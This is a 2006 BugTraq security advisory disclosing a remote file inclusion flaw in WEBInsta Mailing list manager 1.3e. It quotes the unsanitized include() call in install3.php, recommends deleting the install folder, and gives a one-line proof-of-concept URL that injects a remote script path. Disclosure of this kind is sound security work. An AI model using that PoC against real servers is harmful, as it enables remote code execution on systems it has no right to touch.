BugTraq
WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI Aug 10 2006 09:07PM
philipp niedziela gmx de
+--------------------------------------------------------------------

+

+ WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI

+

+ Original advisory:

+ http://www.bb-pcsecurity.de/Websecurity/311/org/+ WEBInsta_Mailing_list_manager_(cabsolute_path)_1.3e_RFI.htm

+

+--------------------------------------------------------------------

+

+ Affected Software .: WEBInsta? Mailing list manager 1.3e

+ Venedor ...........: http://www.webinsta.com

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de

+

+--------------------------------------------------------------------

+

+ Code /istall/install3.php:

+

+ .....

+ if($database=="none")

+ {

+ include($cabsolute_path.'inc/adodbt/db.inc');

+ $conn = &ADONewConnection();

+ .....

+

+--------------------------------------------------------------------

+

+ $cabsolute_path is not properly sanitized before being used

+

+--------------------------------------------------------------------

+

+ Solution:

+ Delete folder "install" after installation!!

+

+--------------------------------------------------------------------

+

+ PoC:

+

+ http://[target]/install/install3.php?database=none&cabsolute_path=[scrip
t]

+

+--------------------------------------------------------------------

+

+ Greets: /str0ke

+

+-------------------------[ E O F ]----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus